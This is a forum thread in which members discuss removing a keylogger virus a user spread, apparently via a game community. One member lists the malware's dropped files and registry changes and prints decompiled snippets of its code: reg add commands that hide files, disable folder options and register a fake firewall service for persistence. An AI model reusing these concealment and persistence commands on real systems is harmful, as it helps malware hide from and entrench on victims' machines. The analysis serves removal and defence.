Removing Glennis Virus

[Anticept]

Guys, just move on. Glenni isn't anyone particularly special or impressive, all he did was use a script-kiddie method of gaining access to someone's computer. Few people fell for it, had a few laughs, woohoo, some people learned some lessons. He's not the first who has done it, he won't be the last.

He's just an attention whore, if he posts, just report it. Don't feed the trolls.

[bulldog533]

And if it is a good keylogger it hooks onto windows APIs and also listens for stuff typed by a virtual keyboard

Ya that's true.
I forgot about that.

[The North]

Wow, i have missed so much in just a couple months, including a virus crisis. I hope all you guys are successful at removing the keylogger.

[Ninja101]

Having ran HijackThis on VM doing ye olde "Before and After" thingy. All files created are all listed, so you're all safe and almost sound :3

[Vengeance]

I got mine removed thanks for making this thread, although it really did fail.. on startup the virus will send a "dont send error report" :P

[mmavipc]

Yay! I feel so happy! I'm the one who found proof first that it was a virus! But what worries me is, GMod lua can have html pages. These html pages can run java. Java can give you viruses. GMod is not virus protected?

Edit: And oh yeah, Glenni is a giant dumbass(I know 5 ways how he could have made the virus extremely painful to delete)

IT GETS INTO YOUR MSN MESSENGER TOO!
C:\\WINDOWS\\system32\\dllcache\\tmp.exe is also part of the virus
and C:\\WINDOWS\\system32\\dllcache\\temp.exe

It also uses limewire to spread "windows_7full.scr"
which is located in programfiles\\Shared\\

Virus: C:\\WINDOWS\\system32\\drivers\\temp123.exe
Virus : C:\\WINDOWS\\system32\\temp.exe
Virus: recycler\\S-1-5-21-8749679017-0950430147-468708784-3200\\recycler.scr
virus: C:\\WINDOWS\\system32\\dllcache\\recycled.exe
virus : C:\\WINDOWS\\system32\\dllcache\\myporn.scr
virus: C:\\WINDOWS\\system32\\dllcache\\doc.pif
virus: C:\\windows\\system32\\drivers\\svchost.exe(I'ts not normally there)
virus : C:\\windows\\system32\\drivers\\tmpp.exe
[trys to infect]
virus: C:\\windows\\system32\\drivers\\tmpp.exe
Check your C:\windows\explorer.exe for (-Two-Binded-Files-From-Nathan72389s-Free-Example-Binder-)
virus: C:\\WINDOWS\\system32\\dllcache\\stub.exe
virus: C:\\WINDOWS\\system32\\dllcache\\recycled.exe
All of your autorun.inf
[/trys to infect]
Virus : C:\\windows\\system32\\winlogon.scr
Check your HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\9. 0\\Outlook\\Security for a entry called Level1Add if ti contains ".exe,.pif,.exe" Delet it
Check your HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Con trol\\Lsa for a entry called UAC with a value of "C:\\WINDOWS\\system32\\dllcache\\svchost.exe" Delete it(It's not on my system)

Check HKEY_CURRENT_USER\\Software\\Microsoft\\OLE for a entry called UAC with a value of "C:\\windows\\system32\\drivers\\svchost.exe" Delete it(it's not on my system)

Check HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon entry "Shell" DO NOT DELETE THIS! If it contains anything other than explorer.exe set the whole entire thing to "explorer.exe" DO NOT DELETE IT! THIS WOULD CAUSE YOUR SYSTEM TO MALFUNCTION

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon entry "UIHost" What it should be: "logonui.exe"

Virus : C:\\windows\\system32\\net.vbs
Virus : C:\\windows\\system32\\launch.vbs
Virus : C:\\windows\\system32\\launch.bat
Check for C:\\windows\\system32\\logg.txt PM me the contents(Remove any sensitive info like passwords i'm not looking for that kind of shit) and then delete it

virus : C:\\WINDOWS\\system32\\drivers\\Interop.MessengerA PI.dl
virus : C:\\WINDOWS\\system32\\dllcache\\Interop.Messenger API.dll
virus : C:\\WINDOWS\\system32\\pptemp.txt
virus:C:\\windows\\system32\\tmp.dll

Check your %windir%\\system32\\drivers\\etc\\hosts for any suspicious entries(like 127.0.0.1 antivir.de) Delete the entries but not the file

Virus: %windir%\\system32\\13l.dll
Virus : %windir%\\system32\\pbrl.vbs

It also tries to send email to everyone with your outlook with a mesage body of ""Hello , could you take a look to my picture i have taken some days ago?" and a subject of "HEY" Delete any messages you get and tlel your firends to delete those messages too

That's all the settings it changes

Code:

ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\" /v \"HideFileExt\" /t \"REG_DWORD\" /d 1 /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
    ldloc.s 0xA
    ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\" /v \"Hidden\" /t \"REG_DWORD\" /d 2 /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
    ldloc.s 0xA
    ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /v \"NoFind\" /t \"REG_DWORD\" /d 1 /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
    ldloc.s 0xA
    ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /v \"NoFolderOptions\" /t \"REG_DWORD\" /d 1 /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
    ldloc.s 0xA
    ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\" /v \"SuperHidden\" /t \"REG_DWORD\" /d 0 /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
    ldloc.s 0xA
    ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\" /v \"ShowSuperHidden\" /t \"REG_DWORD\" /d 0 /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)

PM me the contents of %windir%\\teemp.txt then delete it(remove sensitive info)

Virus: %%t\\readme.scr

Remove senseitive info from %windir%/tmp.log PM me the contents and delete it

Virus: C:\\start.exe
Virus: %windir%\\temp.dat
Virus: %%n\\windows_7_full.exe
Virus: %windir%\\temp.dtx
Virus: %%y\\windows_7_full.exe
Virus: %windir%\\tam.dl

It also adds user accounts

Virus: %windir%\\teest.txt
Check your netbios shared folders for funny.scr, and LOOL.pif delete them

Virus: %%g\\%%v\\STUPID.scr
Virus: %windir%\\input123.blp
virus: %windir%\\teest.txt

Check all of your p2p sharing programs

virus: Microsoft\\Messenger\\porn_(Anything can be here, it's random).sc
Virus: %windir%\\system32\\tomp.txt


My lazyness is going tolet you figure otu what this code does

Code:

 ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"ImagePath\" /t \"REG_EXPAND_SZ\" /d \"C:\\windows\\system32\\drivers\\svchost.exe\" /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
    ldloc.s 0xA
    ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"DisplayName\" /d \"Default Windows Firewall\" /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
    ldloc.s 0xA
    ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"ObjectName\"  /d \"LocalSystem\" /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
    ldloc.s 0xA
    ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"Start\" /t REG_DWORD /d \"2\" /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
    ldloc.s 0xA
    ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"ErrorControl\" /t REG_DWORD /d \"0\" /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
    ldloc.s 0xA
    ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"Type\" /t REG_DWORD /d \"110\" /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
    ldloc.s 0xA
    ldstr "reg add  \"HKEY_CURRENT_USER\\Software\\Patchou\\Messenger Plus! Live\\GlobalSettings\\Scripts\\MSN PLUS\" /v background /d "
    ldarg.0

If you use the autoit scripting language all of your include files are infected!

Virus: %windir%\\system32\\sys.bat

CHECK YOUR MIRC INI FILES

Virus: %windir%\\ftp

Tries to stop McAffe firewall

Virus: C:\\windows\\system32\\s4c.vbs

It tries to hijack skype

Another attemp to hack messenger

Code:

    ldstr "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\MessengerService\\Policies"
    ldstr "IMWarning"
    ldstr "(M)Warning: The person who you are talking to is infected with a virus. Send him the removal tool that can be found in"
    ldarg.0

ldstr "HKEY_CURRENT_USER\\Software\\Yahoo\\pager\\View\\ YMSGR_buzz"
ldstr "content url"
Kill it

In your temp files youll have win_update.exe DELETE it

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon Entry "UserInit" set it to "C:\\WINDOWS\\SYSTEM32\\Userinit.exe"

And that's all I can get from server.exe
If you have any of the other virus file's handy upload them somewhere and PM me a link

I do all this and do credit? Ahh w/e

[mattwd0526]

We love you, we're just too embarrassed to admit it ;D

[SystemsLock]

Sorry if we didn't do you credit mmavipc. The information was extremely helpful.

I agree with Anticept this was a piss-poor excuse for a virus, its seems luckily that not too many people were hit, and he barley did any damage at all. None the less however it was fucking annoying.

[Bull]

Guys, just move on. Glenni isn't anyone particularly special or impressive, all he did was use a script-kiddie method of gaining access to someone's computer. Few people fell for it, had a few laughs, woohoo, some people learned some lessons. He's not the first who has done it, he won't be the last.

He's just an attention whore, if he posts, just report it. Don't feed the trolls.

QFT - Closed.
Feel free to pm if you have something important to add to this thread, if not, let it die and stop feeding his "pride".

[Matte]

Keyboard Tutorial.
Keyboard tutorial - Page 1


http://www.hackforums.net/showthread.php?tid=170170

All he did was to batch the autorun file.... He's a master at this stuff.